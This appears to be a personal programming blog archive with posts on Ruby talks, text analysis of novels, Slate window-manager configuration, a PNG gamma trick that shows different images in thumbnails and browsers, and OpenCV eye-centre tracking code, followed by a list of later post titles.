The first talk I did was on writing programming contests in Ruby. I write lots of programming contests and have tried using a couple different languages for them but keep coming back to Ruby.

Ruby > Shell Scripts

My most recent talk which I gave last meeting was on using Ruby as a scripting language to automate repetetive tasks.

Developing a Gem in 20 Minutes

I live coded a simple Ruby gem using Bundler in 20 minutes and explained some tricks and how easy it was to write Ruby Gems.

Here’s a Transcript

Improv lighting Talk

I recently gave an improvised lightning talk prompted by the lack of other lighting talks called “How to do a lightning talk.” I talked about choosing a topic that you feel you have unique knowledge of to give you more confidence and how all that was really important was the confidence to go up there. Everything else would work itself out.

Hacking English Class

2013-01-24T00:00:00+00:00

I was sitting in English class last year and thinking about how English was about as far away from programming as you can get. We were discussing the significance of characters in the novel Lord of the Flies and I thought “I wonder if I could write a program to analyze this book, that would be ironic.”

So that evening I wrote a Ruby script that analyzed the occurences of characters names in Lord of the Flies and graphed it over time. It was a fun graph, especially the most noticable feature being references to “Piggy” suddenly dropping.

I went on to write another script to analyze Lord of the Flies as well as other scripts during English class this year. Here are some of the ones I have come up with, starting with the most recent.

Most recently I wrote a program that reads entire stories and generates passages that capture the texture of the story using Markov Trees.

In grade 11 my project was analyzing the most common colours in The Great Gatsby. My teacher thought that yellow would be the most common but it turns out to be white.

My other work this year was highlighting important words in the poem Beowulf.

As well as my two Lord of the Flies graphs.

The second one shows words that appear close together, the saturation indicates how often they occur close together.

Using Slate: A Hacker's Window Manager for Macs

2012-11-19T00:00:00+00:00

Edit: I’ve recently switched to using Mjolnir and have posted a new tutorial on that.

Switching windows with the keyboard on Mac OSX is hilariously inefficient: it involves repeatedly pressing command+tab through millions of programs until you get to the right one when you could have just clicked the window and been done with it. Moving windows is no better so people have resorted to paying for tools like SizeUp and Divvy. I used to have these problems too until I ~~switched to Linux~~ discovered a program called Slate.

Fancy window management is no longer just for Linux users and their XMonad.

Enter Slate

Slate is a keyboard-driven window management program for Mac OSX. It is highly configurable and has tons of features. It has permanently changed the way I use my Mac. Not only is it better than other popular programs like Divvy, SizeUp and Moom, it beats their prices at being free. Slate is the VIM/Emacs of window managers: it is less of a window manager than a workflow changing tool you will never give up.

Slate has so much functionality that I think of it more as a shortcut-based productivity tool than a window manager. Here is a sample of what it can do:

Move/Resize/Shift windows: this can be done based on different screen size fractions and even mathematical formulae. There are commands for practically every window operation you can think of. It also supports the Divvy style sizing grid.
Switch Windows: Slate can act as a complete replacement for command+tab in many ways. I will talk about this more in the “Window Switching” section.
Manage multiple monitors: Slate can move windows between monitors as well as detecting your monitor configuration and automatically moving windows around when you plug in an external monitor.
Save window layouts: Slate has a feature called “snapshots” that allows you to save your current window layout and restore it at any time. This is handy for having different layouts for different projects/tasks.

In this article I will describe the kind of things you can do with Slate and how to configure it to do these things.

Switching Windows

Slate allows me to switch to any window I want in one shortcut and a single key press. I can do this using a feature called “Window Hints”. If you have ever used easyMotion for Vim or Vimperator/Vimium you will be familiar with this concept.

When you press a shortcut (I use cmd+e), every window is instantly overlain with a letter, starting with those on the home row of your keyboard. By pressing the letter over a window your focus is transfered to that window. For windows that are hidden behind others the application icon is displayed in the overlay.

As usual, a picture is worth a thousand words:

Notes: There is an option to overlay the icons with a dark background so that it is easier to read the letters. Also note the fancy Slate managed window layout.

Switching Windows Even Faster

Even though window hints are super fast there are some applications I switch to and from so often that I wanted to be able to do it in one shortcut. Luckily, Slate had my back. Using Slate’s focus command I was able to give my most commonly used programs their own switching shortcuts.

Inspired by this article, I use a program called “PCKeyboard Hack” (ironically mac only) to bind my caps lock key to command+option+shift+control which I call “hyper”. I use this binding to manage all my custom shortcuts. For example, hyper+e focuses on my browser, hyper+u focuses on my editor, hyper+i focuses on iTerm, hyper+m focuses Mail, etc…

Moving Windows

Slate has numerous commands for moving and resizing windows. I personally only use a small portion of them. The most common ones are the classic “resize to left half”, “resize to right half” and “fill the screen”; however, I also have ones like “move this to my other monitor” and “layout my applications across both monitors just the way I like them”. All of these are bound to keyboard shortcuts.

I started off with Slate by rebinding my numpad to window movement commands. Whenever I need to type a number I use the ones along the top of the keyboard so before Slate the numpad was just useless buttons. I bound the numpad keys like to resize windows in the direction they pointed. For example, 5 was fullscreen, 4 was left half and 6 was right half. The other buttons were quarters, top and bottom. Special numpad keys like * and + did things like display a window resizing grid or arrange my windows in a certain layout.

I soon grew tired of reaching for my numpad so I added bindings to the home row of my keyboard using the hyper key. This is more convenient for when I don’t have a numpad and it makes it so I don’t have to reach over.

I have just scratched the surface of what Slate can do in terms of window movement and resizing, Slate has commands for resizing windows incrementally, nudging windows around, resizing to any fraction of the screen you want and even moving windows to specific pixel positions.

Configuring Slate

A.K.A How do I do all this cool stuff?

Like many amazing tools such as VIM and ZSH, Slate is configured through a dotfile in the home directory called .slate. The Slate Readme file has very detailed information on configuring Slate so I am just going to show some tricks that let you do specific things.

The ~/.slate file is made up of different commands. The top level commands are:

config: for global configurations.
alias: to create alias variables.
layout: to configure layouts.
default :to default certain screen configurations to layouts
bind: binds a key to an action.
source: to load configs from another file.

The # character is used for comment lines and ' is used to delimit strings.

General Configuration

Using the config command, you can set a variety of options that change how slate works. Here are some you options that I like to set:

config defaultToCurrentScreen true
# Shows app icons and background apps, spreads icons in the same place.
config windowHintsShowIcons true
config windowHintsIgnoreHiddenWindows false
config windowHintsSpread true

Window Hints

Along with the general configuration from the previous section, all you have to do to use window hints is bind the hint operation to a key. I like to use command+e as it is easy to type and not used in many mac applications.

To do this put the following in your .slate file:

bind e:cmd hint ASDFGHJKLQWERTYUIOPCVBN # use whatever keys you want

You can choose which letters you want window hints to use. The letters will be assigned to windows in the order specified by the windowHintsOrder config option. If you have more windows than there are letters specified, some hints will not be shown. I suggest you start with either the home row of your keyboard or all the keys on one side of the keyboard so you only need one hand.

Window Grid

If you are a fan of the Divvy style window positioning grid Slate can do that too. To bind the window grid to a key use a command like:

bind g:cmd grid padding:5 0:6,2 1:8,3

This particular command binds command+g to show a 6x2 grid on the first monitor (monitor 0) and a 8x3 grid on the second monitor (monitor 1).

Normal Window Management

Slate is so configurable that it allows you to specify any fraction of the screen you want to move windows; however, this can be annoying if you just want to use halves and fullscreen. To remedy this, Slate allows you to create aliases that you can use for common commands.

Here are some aliases I use for common positions:

# Abstract positions
alias full move screenOriginX;screenOriginY screenSizeX;screenSizeY
alias lefthalf move screenOriginX;screenOriginY screenSizeX/2;screenSizeY
alias righthalf move screenOriginX+screenSizeX/2;screenOriginY screenSizeX/2;screenSizeY
alias topleft corner top-left resize:screenSizeX/2;screenSizeY/2
alias topright corner top-right resize:screenSizeX/2;screenSizeY/2
alias bottomleft corner bottom-left resize:screenSizeX/2;screenSizeY/2
alias bottomright corner bottom-right resize:screenSizeX/2;screenSizeY/2

You can then bind these commands to any keys you want. For example, you can use the numpad to move windows around:

# Numpad location Bindings
bind pad1 ${bottomleft}
bind pad2 push bottom bar-resize:screenSizeY/2
bind pad3 ${bottomright}
bind pad4 ${lefthalf}
bind pad5 ${full}
bind pad6 ${righthalf}
bind pad7 ${topleft}
bind pad8 push top bar-resize:screenSizeY/2
bind pad9 ${topright}

Layouts

Layouts allow you to tell Slate how you like your windows arranged so it can arrange them for you. To create a layout you have to specify how you like your applications arranged and then you bind the layout to a keyboard shortcut.

We can re-use the aliases from the last section in our layout definitions like this:

layout 1monitor 'iTerm':REPEAT ${bottomright}
layout 1monitor 'Sublime Text 2':REPEAT ${lefthalf}
layout 1monitor 'MacVim':REPEAT ${lefthalf}
layout 1monitor 'Safari':REPEAT ${righthalf}
layout 1monitor 'Mail':REPEAT ${righthalf}
layout 1monitor 'Path Finder':REPEAT ${topright}
layout 1monitor 'Xcode':REPEAT ${full}
layout 1monitor 'Eclipse':REPEAT ${full}
layout 1monitor 'iTunes':REPEAT ${full}

Then we can bind the layout to a key like this:

bind l:cmd layout 1monitor

Now whenever we press command+l our apps will arrange themselves the way we like. In this example I named my layout 1monitor1 but you can give it a meaningful name and even have multiple layouts with different names.

Ultra-Fast App Switching

To bind shortcuts directly to focusing an app you can use the focus command. For example, we can bind command+option+b to focus our browser:

bind b:cmd;alt focus 'Google Chrome'

My .slate

Here is my .slate file in its entirety, do note that it is optimized for the Dvorak keyboard layout, so some of the shortcuts may seem weird and the hint keys are the Dvorak home row rather than qwerty.

Magic PNG Thumbnails

2012-11-14T00:00:00+00:00

I was shown trick by a friend where an image was posted on a website that displayed one thing in the thumbnail and another in the lightbox. http://funnyjunk.com/channel/ponytime/rainbow+dash/llhuDyy/15#15

This post contains an explanation of how these images work and how I was able to replicate their behaviour.

The Behaviour

Certain renderers of the png files would display one image and other renderers would display a completely different one. One image is always dark and one is light.

Example:

Things that display the light image:

Thumbnail renderers (Facebook, etc…)
Apple png rendering
Windows png rendering

Things that display the dark image:

Firefox (and by extension anything that uses libpng)
Google Chrome

This can lead to interesting combos:

linking the image on facebook can show one image as a thumbnail but a completely different one when the link is clicked.
A picture that detects the user’s browser. (Chrome/Firefox or Safari)
A picture that displays one thing in the browser and a different thing when downloaded to the user’s (victim’s) computer.
The classic image board thumbnail.

The Challenge and Victory

I started on a long journey to figure out how this effect works so that I could replicate it. The path to enlightenment involved many wrong turns including believing that the image was being interpreted as a GIF but I eventually discovered the truth.

After I discovered the secret I wrote a command line tool in Ruby called doubleVision so that anybody could generate magic thumbnail images.

doubleVision is available on Github and as an executable Ruby gem.

The output images look like this:

Try downloading it to your computer and then viewing it. Cool eh?

How it works

The PNG specification contains a metadata attribute that allows you to specify the gamma to render the image with. This attribute is intended to be used to ensure that images look identical on all computers. This is a very normal image processing process called Gamma Correction

The PNG specification defines the gAMA chunk (the chunk that stores the gamma value) to change the image output like so:

light_out = image_sample^(1 / gamma)

This scales the image values exponentially based on the reciprocal of the gamma value. If the gamma value is around 1 like it normally is this function has little noticeable effect. During this process, the lowest brightness value for a pixel is 0 and the highest is 1.

If we set the PNG gamma attribute to a very low value, making the exponent value very high (since it is the reciprocal), all darker pixels will be made black and all lighter pixels will be mapped to the normal spectrum.

Exponential Gamma Mapping

We can reverse this mapping for a very low value of the gamma attribute (I use 0.023) to get a PNG image where all the pixels of the image are mapped to very light colors. If we then set the gamma value of the PNG to 0.023 the image will look somewhat normal, except for the rounding errors introduced by crunching the image into high values.

The thing is, not all renderers support the gamma attribute. If we try and view this image in a renderer that does not support the gamma attribute it will show too bright to make out.

We can abuse this to create a magic thumbnail by taking two images of the same size and creating a new image twice their dimensions. One image is run through the previously mentioned reverse gamma filter that makes all pixels very bright and the other is darkened so that it has no very bright pixels. The images are then spaced out in grids around each other (see image). The resulting image is saved as a PNG file with a gAMA of 0.023.

Pixel Grid Pattern

When the image is displayed in a renderer that supports gamma (Like Firefox/Chrome) the light pixels become fairly dark but visible colors and the normal pixels become a grid of dark pixels. When the image is displayed in a renderer that does not support gamma (like Apple/Microsoft rendering) The untransformed image is shown surrounded by a grid of seemingly white pixels.

Installation and Usage

You can install the doubleVision gem and command using:

$ gem install doubleVision

Next, run the program like this:

doubleVision withgamma.png withoutgamma.png out.png

obviously replacing the filenames with your own.

It will combine the images into one image (out.png) that will display withgamma.png when viewed with gamma support (e.g. in Firefox) and withoutgamma.png when displayed without gamma support (e.g. As a thumbnail)

For more detailed instructions read the README on Github

Other Example

Was generated from: and

Simple, accurate eye center tracking in OpenCV

2012-11-04T00:00:00+00:00

I am currently working on writing an open source gaze tracker in OpenCV that requires only a webcam. One of the things necessary for any gaze tracker¹ is accurate tracking of the eye center.

For my gaze tracker I had the following constraints:

Must work on low resolution images.
Must be able to run in real time.
I must be able to implement it with only high school level math knowledge.
Must be accurate enough to be used for gaze tracking.

I came across a paper² by Fabian Timm that details an algorithm that fit all of my criteria. It uses image gradients and dot products to create a function that theoretically is at a maximum at the center of the image’s most prominent circle.

Here is a video he made of his algorithm in action:

Before continuing I recommend that you read his paper.

Implementing the algorithm

After implementing the algorithm detailed in the paper using OpenCV functions my implementation had horrendous accuracy and many problems. These were partially caused by the paper not specifying some important numbers.

These numbers include:

The eye region fractions.
The gradient magnitude threshold.
The size of the eye regions used.

I contacted Dr. Timm and he helped me with some of my problems. Below are some problems that I resolved with Dr. Timm’s help.

Things That Are Not in the Paper

The first thing I fixed was the eye region fractions as portions of the face. From Dr. Timm:

Let (x, y) be the upper left corner and W, H the width and height of the detected face. Then, the mean of the right eye centre is located at (x + 0.3, y + 0) and the mean of the left centre is at position (x + 0.7, y + 0.4).

On his recommendation I also applied a gaussian blur to the face before processing it to smooth noise. I use the sigma of 0.005 * sideLengthOfFace.

The Gradient Algorithm

One important thing that is not explained very clearly in the paper is the gradient algorithm. In his implementation he uses the MatLab gradient function. In my original implementation I used a Sobel operator but by imitating MatLab’s gradient function I achieved much better results.

The way MatLab’s gradient algorithm works (in Matlab code) is [x(2)-x(1) (x(3:end)-x(1:end-2))/2 x(end)-x(end-1)] with x being the input. Translated into C++ and OpenCV this comes out as:

cv::Mat computeMatXGradient(const cv::Mat &mat) {
  cv::Mat out(mat.rows,mat.cols,CV_64F);

  for (int y = 0; y < mat.rows; ++y) {
    const uchar *Mr = mat.ptr<uchar>(y);
    double *Or = out.ptr<double>(y);

    Or[0] = Mr[1] - Mr[0];
    for (int x = 1; x < mat.cols - 1; ++x) {
      Or[x] = (Mr[x+1] - Mr[x-1])/2.0;
    }
    Or[mat.cols-1] = Mr[mat.cols-1] - Mr[mat.cols-2];
  }

  return out;
}

to get the Y gradient I simply take the X gradient of the transpose matrix and transpose it again(computeMatXGradient(eyeROI.t()).t())

By replicating his gradient algorithm I was also able to use the same gradient threshold as him. From Dr. Timm:

I remove all gradients that are below this threshold:

0.3 * stdMagnGrad + meanMagnGrad

where “stdMagnGrad” and “meanMagnGrad” are the standard deviation and the mean of all gradient magnitudes, i.e. the length of the gradients.;

The “Little Thing” that he didn’t mention

Because his algorithm in the form he gives in the paper is generalized to all circles he left out one tiny important thing. For me this one line of code made the difference between it working and being terribly innacurate.

In the equation he gives the dot product of the d vector and the gradient is taken and then squared. The thing is this makes negative dot products positive.

Dot products are negative if the vectors are pointing in opposite directions. The gradient function used creates vectors that always point towards the lighter region. Since the iris is darker than the sclera (white part) the vectors of the iris edge always point out. This means that at the center they will be facing in the same direction as the d vector. Anything pointing in the opposite direction is irrelevant

To fix this I added a line of code that turns negative values into zero so they have no effect on the result: dotProduct = std::max(0.0,dotProduct);

After adding this line of code my implementation tracked my eyes excellently and worked exactly as it should.

#Conclusion

Dr. Timm’s eye center location algorithm is an excellent simple way to track the pupil, but only if you add a few extra things that he does not talk about in his paper.

In terms of my eye tracker at the moment this is all I have implemented. I am still looking into methods of tracking a reference point like eye corner to accurately judge where the user is looking.

I am also looking into using deformation of the eye into an oval to determine the orientation of the iris.

An eye tracker gives the pixel position of the center of the pupil in an image whereas a gaze tracker determines where the person is looking on the screen. ↩
Timm and Barth. Accurate eye centre localisation by means of gradients. In Proceedings of the Int. Conference on Computer Theory and Applications (VISAPP), volume 1, pages 125-130, Algarve, Portugal, 2011. INSTICC. ↩

Tristan Hume

All my favorite tracing tools: eBPF, QEMU, Perfetto, new ones I built and more

Easily visualizing data on a trace timeline

Advanced Format: Fuchsia Trace Format

Advanced Format: Perfetto Protobuf

Other tools

Tracing Methods

Hardware breakpoints

perf and perftrace

GDB scripting

Intel Processor Trace

magic-trace

Instrumentation-based tracing profilers

Other programs

eBPF

BCC: Easy Python API for eBPF

bpftrace: terse DSL for eBPF tracing

ply: simpler bpftrace

eBPF Example: Anthropic’s Perfetto-based packet and user event tracing

Trick for tracing userspace events with low overhead in eBPF

How to process events more quickly using a C helper with BCC

Perks of Perfetto visualization

Binary Instrumentation

bpftime: eBPF-based binary instrumentation

E9Patch

Frida

LD_PRELOAD

Distributed Tracing

Sampling Profilers

QEMU Instrumentation

Cannoli

QEMU TCG Plugins

usercorn

Conclusion: If you liked this you may like my team at Anthropic

Production Twitter on One Machine? 100Gbps NICs and NVMe are fast

Core Tweet Distribution

How big is Twitter?

Hot set in RAM, rest on NVMe

My Prototype

Can the prototype meet the real load? Very yes!

Conclusion-ish: It’s not practical to build this way, but maybe it could be

Directly serving web requests

Live updating and infinite scroll

Images: Kinda!?

Features that probably don’t fit and are hard to estimate

Video

Search

Notifications

Ads

Algorithmic Timelines / ML

Bandwidth costs: They can be super expensive or free!

How cheaply could you serve Twitter: Pricing it out

Conclusion

My DIY ergonomic travel workstation with aluminum and magnets

Transforming with magnets

Other setups

Optimizing sleeping on flights

More detail

More on the Sofle Choc keyboard kit

Other fun with SendCutSend

Latency testing remote browsing: Why display streaming is hard

Why this remote browser?

Typing latency

Encoding the whole window means latency scales with window size

H264 is lower latency but not the default

Scrolling

Remotey’s potential advantage, which they don’t use

Gotchas on macOS

Page loading

General experience

Conclusion

Making reverse engineering tools for DEF CON Quals

Full write-up from my teammate

Reversing the Manchester VM binary

Fooling around with the Binary Ninja Debugger

Memory trace reconstruction tool

Concluding Thoughts

Implicit In-order Forests: Zooming a billion trace events at 60fps

The IForestIndex data structure

What’s good about this layout

The `IForestIndex` data structure

Sending a process using `telefork`

Receiving a process using `telepad`